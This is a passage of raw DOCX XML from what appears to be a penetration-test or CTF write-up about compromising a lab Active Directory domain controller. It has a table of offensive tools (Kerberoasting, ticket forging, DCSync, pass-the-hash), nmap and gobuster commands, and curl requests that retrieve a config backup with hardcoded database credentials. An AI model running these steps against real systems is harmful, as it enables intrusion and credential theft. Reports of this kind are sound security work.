      <w:bookmarkStart w:id="10" w:name="_Toc234251538"/>
      <w:r>
        <w:rPr/>
        <w:t>2.4 Toolset</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The following tools were used during the engagement:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:start w:w="110" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:end w:w="110" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2600"/>
        <w:gridCol w:w="6760"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600"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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6760"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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Port scanning and service/version detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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gobuster / robots.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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Web content and directory discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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rdesktop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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Remote Desktop client for the initial foothold</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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smbclient / netexec (nxc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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SMB share enumeration and file retrieval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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rpcclient</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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RPC / MS-RPC enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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ldapdomaindump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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LDAP enumeration and naming-context discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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impacket-GetUserSPNs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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Kerberoasting - TGS-REP extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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Offline password cracking (mode 13100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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impacket-findDelegation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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Enumeration of Kerberos delegation rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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impacket-getST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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S4U2Self / S4U2Proxy ticket forging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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impacket-secretsdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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DCSync / NTDS.dit hash extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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evil-winrm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="67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sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pass-the-Hash remote shell over WinRM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1F2A44"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc234251539"/>
      <w:r>
        <w:rPr/>
        <w:t>3. Attack Narrative (Walkthrough)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This section provides a chronological, reproducible walkthrough of the compromise. Commands are provided for reproducibility; screenshot placeholders indicate where supporting evidence should be inserted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc234251540"/>
      <w:r>
        <w:rPr/>
        <w:t>3.1 Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A full TCP port scan with service detection was performed against the target. The results confirmed a Windows Active Directory Domain Controller also hosting a Microsoft IIS 10.0 web server.</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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nmap -Pn -sC -sV -p- --min-rate 2000 10.64.148.30 -oN nmap_full.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Key services identified:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:start w:w="110" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:end w:w="110" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="3600"/>
        <w:gridCol w:w="4360"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1400"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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3600"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Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4360"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Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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53</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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Simple DNS Plus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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Microsoft IIS httpd 10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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88</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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Kerberos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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Windows Kerberos (server time confirmed AD)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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389 / 3268</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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LDAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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AD LDAP - Domain: COOCTUS.CORP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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445 / 139</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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Microsoft-DS / NetBIOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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464</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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kpasswd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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Kerberos password change</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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3389</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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RDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="43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Microsoft Terminal Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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5985 / 9389</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="360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WinRM / ADWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436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.NET Message Framing / remote management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="60"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The domain name was added to the local hosts file to support Kerberos and name-based tooling:</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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>echo '10.64.148.30  DC.COOCTUS.CORP COOCTUS.CORP DC' | sudo tee -a /etc/hosts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="483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15000" cy="4838700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 1 - Nmap full port scan confirming an AD Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc234251541"/>
      <w:r>
        <w:rPr/>
        <w:t>3.2 Web Enumeration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The IIS web server was reviewed for exposed content. Directory brute-forcing with gobuster and a review of robots.txt both surfaced the same disallowed paths pointing at sensitive files:</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gobuster dir -u http://10.64.148.30 \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-x php,txt,bak,old -k -b 301,404</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># robots.txt   (Status: 200)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7FB0FF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t># backdoor.php (Status: 200)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5715000" cy="2238375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 526739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26739178"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="2238375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 2 - gobuster directory enumeration confirming robots.txt and backdoor.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> file disclosed three disallowed paths:</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curl -s http://10.64.148.30/robots.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>User-Agent: *</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Disallow: /robots.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Disallow: /db-config.bak</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Disallow: /backdoor.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 177769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77699221"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4953000" cy="1733550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 3 - robots.txt disallowed entries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Retrieving </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/db-config.bak</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> returned a PHP database configuration backup containing hardcoded credentials for the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>db.cooctus.corp</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> database:</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curl -s http://10.64.148.30/db-config.bak</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>$servername = "db.cooctus.corp";</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="40"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>$username   = "C00ctusAdm1n";</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="E6E9F0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>$password   = "B4dt0th3b0n3";</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="60" w:after="40"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="2933700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 1744681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44681938"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4953000" cy="2933700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B6472"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 4 - db-config.bak source showing plaintext database credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
